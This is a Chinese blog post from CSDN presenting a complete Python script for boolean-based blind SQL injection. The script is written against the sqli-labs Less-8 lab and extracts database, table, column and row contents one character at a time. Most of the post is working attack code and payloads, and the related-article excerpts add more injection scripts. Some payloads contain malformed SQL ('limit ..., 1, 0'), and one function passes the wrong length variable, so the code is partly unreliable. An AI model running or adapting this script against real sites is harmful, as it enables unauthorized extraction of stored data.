SQL注入:布尔注入脚本

最新推荐文章于 2024-05-23 16:17:43 发布
最新推荐文章于 2024-05-23 16:17:43 发布
阅读量852 收藏 10
点赞数 1
分类专栏: web安全 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35208730/article/details/118912668
版权
实现思路

将payload以字典形式存储,循环遍历时对payload字符串中相应参数进行格式化。按以下顺序依次获取数据,其实四个步骤逻辑一样,都是先获取数量,然后获取长度,最后获取内容。

  1. 数据库名:获取库名长度,库名
  2. 数据库表:获取数据库表数量,表名长度,表名
  3. 表字段:获取字段数,字段名长度,字段名
  4. 表数据:获取该字段数据行数,数据长度,数据内容
关键代码

获取不同数据的payload字典

payload_dict = {
    "db_name_len":      "' and if(length(database())={number}, 1, 0) -- qwe",
    "db_name":          "' and if(ascii(substr(database(), {substr_index}, 1))={number}, 1, 0) -- qwe",
    "table_num":        "' and if((select count(*) from information_schema.tables where table_schema=database())={number}, 1, 0) -- qwe",
    "table_name_len":   "' and if(length((select table_name from information_schema.tables where table_schema=database() limit {limit_index}, 1))={number}, 1, 0) -- qwe",
    "table_name":       "' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {limit_index}, 1), {substr_index}, 1))={number}, 1, 0) -- qwe",
    "column_num":       "' and if((select count(*) from information_schema.columns where table_schema=database() and table_name='{table_name}')={number}, 1, 0) -- qwe",
    "column_name_len":  "' and if(length((select column_name from information_schema.columns where table_schema=database() and table_name='{table_name}' limit {limit_index}, 1))={number}, 1, 0) -- qwe",
    "column_name":      "' and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='{table_name}' limit {limit_index}, 1), {substr_index}, 1))={number}, 1, 0) -- qwe",
    "data_num":         "' and if((select count(*) from {table_name})={number}, 1, 0) -- qwe",
    "data_len":         "' and if(length((select {column_name} from {table_name} limit {limit_index}, 1, 0))={number}, 1, 0) -- qwe",
    "data":             "' and if(ascii(substr((select {column_name} from {table_name} limit {limit_index}, 1), {substr_index}, 1))={number}, 1, 0) -- qwe"
}

核心函数

# 获取数据长度/数量
def get_len(payload, **parameter):
    target_url = url + payload
    for i in range(999):
        parameter["number"] = i
        res = conn.get(target_url.format(**parameter))
        if flag in res.text:
            return i

# 获取数据内容
def get_content(payload, **parameter):
    name = ""
    target_url = url + payload
    substr_index = parameter["substr_index"]
    # 根据字段长度,遍历获取每个字符
    for i in range(1, substr_index+1):
        parameter["substr_index"] = i
        # 猜解字符
        for j in range(33, 128):
            parameter["number"] = j
            res = conn.get(target_url.format(**parameter))
            if flag in res.text:
                name += chr(j)
    return name

substr_index参数每次传进来的是数据长度,然后再遍历猜解每个字符

全部代码
# sql布尔盲注
"""
实现思路
1. 获取库名长度
2. 获取库名
3. 获取数据库表数量
4. 获取表名长度
5. 获取表名
6. 获取字段数
7. 获取字段名长度
8. 获取字段名
9. 获取数据表行数
10.获取该字段数据长度
11.获取数据内容
"""

import requests
flag = "You are in..........."
conn = requests.session()
url = "http://localhost/sqli/Less-8/?id=1"

# 获取不同数据的payload字典
payload_dict = {
    "db_name_len":      "' and if(length(database())={number}, 1, 0) -- qwe",
    "db_name":          "' and if(ascii(substr(database(), {substr_index}, 1))={number}, 1, 0) -- qwe",
    "table_num":        "' and if((select count(*) from information_schema.tables where table_schema=database())={number}, 1, 0) -- qwe",
    "table_name_len":   "' and if(length((select table_name from information_schema.tables where table_schema=database() limit {limit_index}, 1))={number}, 1, 0) -- qwe",
    "table_name":       "' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {limit_index}, 1), {substr_index}, 1))={number}, 1, 0) -- qwe",
    "column_num":       "' and if((select count(*) from information_schema.columns where table_schema=database() and table_name='{table_name}')={number}, 1, 0) -- qwe",
    "column_name_len":  "' and if(length((select column_name from information_schema.columns where table_schema=database() and table_name='{table_name}' limit {limit_index}, 1))={number}, 1, 0) -- qwe",
    "column_name":      "' and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='{table_name}' limit {limit_index}, 1), {substr_index}, 1))={number}, 1, 0) -- qwe",
    "data_num":         "' and if((select count(*) from {table_name})={number}, 1, 0) -- qwe",
    "data_len":         "' and if(length((select {column_name} from {table_name} limit {limit_index}, 1, 0))={number}, 1, 0) -- qwe",
    "data":             "' and if(ascii(substr((select {column_name} from {table_name} limit {limit_index}, 1, 0), {substr_index}, 1))={number}, 1, 0) -- qwe"
}

# 传参字典
parameter = {}

# 获取数据库名
def get_dbname():
    print("[*] ===================开始获取数据库名长度===================")
    db_name_len = get_len(payload_dict["db_name_len"])
    print("[+] 数据库名长度为: ", db_name_len)
    db_name = get_content(payload_dict["db_name"], substr_index=db_name_len)
    print("[+] 数据库名为: ", db_name)
    return db_name

# 获取库中所有表(返回列表形式)
def get_table(db_name):
    print("[*] ===================开始获取所有表===================")
    # 获取数据库表数量
    table_num = get_len(payload_dict["table_num"])
    print("[*] 数据库{}的表数量为{}".format(db_name, table_num))
    # 获取所有表名
    table_list = []
    for i in range(table_num):
        # 先获取表名长度
        table_name_len = get_len(payload_dict["table_name_len"], limit_index=i)
        # 再获取表名
        # 先给substr_index传最大值,也就是表名的长度,然后再遍历
        table_name = get_content(payload_dict["table_name"], substr_index=table_name_len, limit_index=i)
        print("[+] 第{}个表名为: {}".format(i+1, table_name))
        table_list.append(table_name)
    return table_list

# 获取数据表中所有字段(返回列表形式)
def get_column(table_name):
    print("[*] ===================开始获取数据表字段===================")
    # 先获取字段数
    column_num = get_len(payload_dict["column_num"], table_name=table_name)
    print("[+] 字段数为: ", column_num)
    # 获取所有字段
    column_list = []
    for i in range(column_num):
        # 先获取字段长度
        column_name_len = get_len(payload_dict["column_name_len"], table_name=table_name, limit_index=i)
        # 再获取字段名
        column_name = get_content(payload_dict["column_name"], table_name=table_name, limit_index=i, substr_index=column_name_len)
        print("[+] 第{}个字段为: {}".format(i+1, column_name))
        column_list.append(column_name)
    return column_list

# 获取列中所有数据(返回列表形式)
def get_column_data(table_name, column_name):
    print("[*] ===================正在获取列{}的数据===================".format(column_name))
    # 先获取数据行数
    data_num = get_len(payload_dict["data_num"], table_name=table_name)
    # 获取数据内容
    data_list = []
    for i in range(data_num):
        # 先获取每行数据长度
        data_len = get_len(payload_dict["data_len"], table_name=table_name, column_name=column_name, limit_index=i)
        # 再获取每行数据内容
        data = get_content(payload_dict["data"], table_name=table_name, column_name=column_name, limit_index=i, substr_index=data_num)
        print("[+] ", data)
        data_list.append(data)
    return data_list

# 数据获取主函数
def get_data(table_list):
    while True:
        # 遍历表
        for i in range(len(table_list)):
            print([i+1], " ", table_list[i])
        index = input("要获取哪个表的数据(输入序号)")
        try:
            index = int(index)
        except Exception:
            print("非法输入")
            continue
        if index > len(table_list) or index < 1:
            print("请重新确认序号")
            continue
        # 用字典来保存表中的数据
        data = {}
        # 先获取列
        column_list = get_column(table_list[index-1])
        # 遍历列
        for j in column_list:
            data[j] = get_column_data(table_list[index-1], j)

        # 以表格形式输出
        for key in data.keys():
            print(key, end="    ")
        print("") # 换行

        value_list = [i for i in data.values()]
        column_num = len(data.keys())
        row_num = len(value_list[0])
        for i in range(row_num):
            for j in range(column_num):
                print(value_list[j][i], end="    ")
            print("")

# 核心函数, 用于获取数据长度/数量
def get_len(payload, **parameter):
    target_url = url + payload
    for i in range(999):
        parameter["number"] = i
        res = conn.get(target_url.format(**parameter))
        if flag in res.text:
            return i

# 核心函数, 用于获取数据内容
def get_content(payload, **parameter):
    name = ""
    target_url = url + payload
    substr_index = parameter["substr_index"] = parameter["substr_index"]
    # 根据字段长度,遍历获取每个字符
    for i in range(1, substr_index+1):
        parameter["substr_index"] = i
        # 猜解字符
        for j in range(33, 128):
            parameter["number"] = j
            res = conn.get(target_url.format(**parameter))
            if flag in res.text:
                name += chr(j)
    return name

if __name__ == '__main__':
    db_name = get_dbname()
    table_list = get_table(db_name)
    get_data(table_list)
运行效果在这里插入图片描述
分等级考试的佛
关注
  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
DVWA布尔注入脚本
Bu2n的博客
12-01 534
DVWA布尔注入脚本 import requests from lxml import etree """ 前提 pip install requests pip install lxml 如果是爆破dvwa的话,只需要网站登录一下dvwa,记录一下cookie,改一下url,referer 如果不是则需要修改的参数有payload,xpath,结果内容 该脚本只测试过low级别 """ url = 'http://192.168.159.132/dvwa/vulnerabilities/sqli
pikachu布尔注入脚本
Bu2n的博客
12-09 855
import requests from lxml import etree """ pikachu布尔脚本改进版,将所有查询函数整合到same()中 改一改url,cookie就好 """ url = 'http://192.168.159.132/pikachu/vul/sqli/sqli_blind_b.php' headers = {'referer':'http://192.168.159.132/pikachu/vul/sqli/sqli_blind_b.php', '
sql注入 布尔盲注基础脚本
树木常青的博客
03-03 1053
基础SQL注入过了一遍,盲注一直不太熟,在sqli-labs上练习时也是找到注入点后上sqlmap。今天学习用pythonsql注入脚本,才发现很多语句不熟,从网上找了一篇教程,自己照着写了写,有些地方自己改了改,感觉收获很大。[这是参照的文章](https://www.cnblogs.com/lzlzzzzzz/p/13998552.html 以sqli-labs第八关为例写的 爆数据库名和表名 import requests s = reques...
手把手教你用Python轻松玩转SQL注入
最新发布
菜鸟学识的博客
05-23 1163
大家好,我是黄伟。相信大家经常有听到过SQL注入啥的,但是并不是特别了解;小编以前就是经常听别人说,但是自己啥都不懂,直到后来看了相关教材后才明白,原来是这么个东西,那么到底是什么东西了,又或者是不是个东西了?我们接着往下看。总的来说,SQL注入无非就是一段艰难险阻的路程,你可以发现但是别人也可以防御,虽然你发现要比较久的时间,但是人家防御却是很轻松,个人觉得得不偿失,不建议大家深入了解,只是做个简单的介绍了解下就好,至少你搜索技能因此而提高了不少吧。
SQL注入脚本
ChiYanq7ng的博客
11-21 126
【代码】SQL注入脚本
Python自动化sql注入布尔盲注_布尔盲注脚本
2401_83739411的博客
04-07 807
学好 Python 不论是就业还是做副业赚钱都不错,但要学会 Python 还是要有一个学习规划。最后大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
SQL住入原始脚本_SQL注入python脚本_
10-03
标题中的“SQL住入原始脚本”指的是利用SQL注入技术来编写或执行的原始SQL命令,而“SQL注入python脚本”则表明我们将探讨如何使用Python编写脚本来自动化这一过程。 SQL注入攻击主要有三种类:直列注入、延时...
SQL脚本_UI_sql注入_sql_
10-01
本主题主要关注通过用户界面(UI)执行的SQL注入攻击,以及两种常见的注入技术:报错注入和基于布尔及时间的盲注。下面我们将深入探讨这些概念。 首先,SQL注入是由于应用程序未能正确过滤或转义用户输入导致的。当...
sqlmap SQL注入扫描软件
03-29
**SQLMap:强大的SQL注入扫描工具** SQLMap是一款开源的自动化工具,专为检测和利用SQL注入漏洞而设计。它的核心功能是通过检测网站应用程序是否存在SQL注入漏洞,进而帮助安全研究人员或渗透测试人员进行安全评估...
sql注入简介
12-22
- 《精通脚本黑客》.pdf:这本书可能包含关于黑客技术和SQL注入的详细信息。 - SQL注入天书.pdf:可能是关于SQL注入技术的深度指南。 - SQL注入攻击简介.ppt:一个可能的PowerPoint演示,概述了SQL注入的基本概念...
Web安全开发:SQL注入攻击和网页挂马.pdf
09-19
* Boolean-based SQL注入攻击:攻击者通过inject恶意的SQL代码,利用布尔值来获取敏感数据。 4. SQL注入攻击的危害 SQL注入攻击可能会导致以下问题: * 数据泄露:攻击者可以访问敏感数据,例如用户名、密码、...
SQL注入脚本SQL注入脚本
11-26
SQL注入脚本SQL注入脚本SQL注入脚本SQL注入脚本SQL注入脚本SQL注入脚本SQL注入脚本SQL注入脚本SQL注入脚本SQL注入脚本SQL注入脚本SQL注入脚本SQL注入脚本SQL注入脚本SQL注入脚本SQL注入脚本SQL注入脚本
sql注入脚本1
m0_55772907的博客
05-01 981
sqllab第一关验证poc import requests import re url = input("输入你的url:") r = requests.get(url) res = str(r.content) if re.search("syntax",res): print("存在sql注入") else: print("不存在")
sql注入布尔盲注-脚本
星空下de青铜
05-05 2928
sql注入布尔盲注-脚本 先给大家普及一下 在MySQL中,把 information_schema 看作是一个数据库,确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。 information_schema数据库常用表说明: SCHEMATA表:提供了当前mysql实例中所有数据库的信息。如show databases就是在这查询的 TABLES表:提供了关于数据...
写一个布尔盲注的脚本
weixin_35752645的博客
01-01 481
布尔盲注是一种数据库攻击技术,其目的是通过查询数据库并猜测结果来确定特定信息。布尔盲注的基本原理是,通过提交查询并猜测其真假,从而获取有关数据库中存储的信息的提示。 如果要写一个布尔盲注脚本,你需要以下步骤: 建立与数据库的连接。 编写 SQL 语句,并将其提交给数据库。 处理数据库的响应。如果响应为真,则可以推断出查询的条件是真的;如果响应为假,则可以推断出查询的条件是假的。 根据获得的信息,...
Bool盲注脚本
Forever_Han13的博客
01-21 640
import requests chars = "qwertyuiopasdfghjklzxcvbnm0123456789}{" url = "http://localhost/sqli-labs-kali2-master/Less-15/" for x in range(0, 10): table_name = "" for y in range(1, 20): for char in chars: payload = {
SQL-LABS GET布尔盲注脚本(node)
AaronLuo
09-03 350
原理 基于SQL-LABS LESS-5,LESS-8 GET布尔注入,(布尔盲注详解),,基于MSQL 布尔盲注,主要是判断ascii码值是否与猜测的值相同,通过判断页面变化,确定ascii值 由于0-z的ascii值是48-122,256 = 2 ^ 0 + 2 ^ 1 + 2 ^ 2 + 2 ^ 3 + 2 ^ 4 +2 ^ 5 + 2 ^ 6 + 2^ 7 ,通过按位与运算8次,结果相加...
【PyHacker编写指南】Sql注入脚本编写
XunanSec的博客
05-15 2293
这节课是巡安似海PyHacker编写指南的《Sql注入脚本编写》有些注入点sqlmap跑不出,例如延时注入,实际延时与语句延时时间不符,sqlmap就跑不出,这就需要我们自己根据实际情况编写脚本注入了。文末,涉及了sqlmap tamper编写,所以需要一定的python基础才能看懂。喜欢用Python脚本的小伙伴可以跟着一起写一写。
SQL注入-布尔盲注】
acepanhuan的博客
02-10 1647
学习SQL注入方法之盲注
sql注入布尔盲注脚本
08-23
对于SQL注入布尔盲注攻击,你可以使用以下脚本示例: ``` SELECT * FROM users WHERE username = 'admin' AND IF(LENGTH(database()) > 1, SLEEP(5), 0); SELECT * FROM users WHERE username = 'admin' AND IF...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值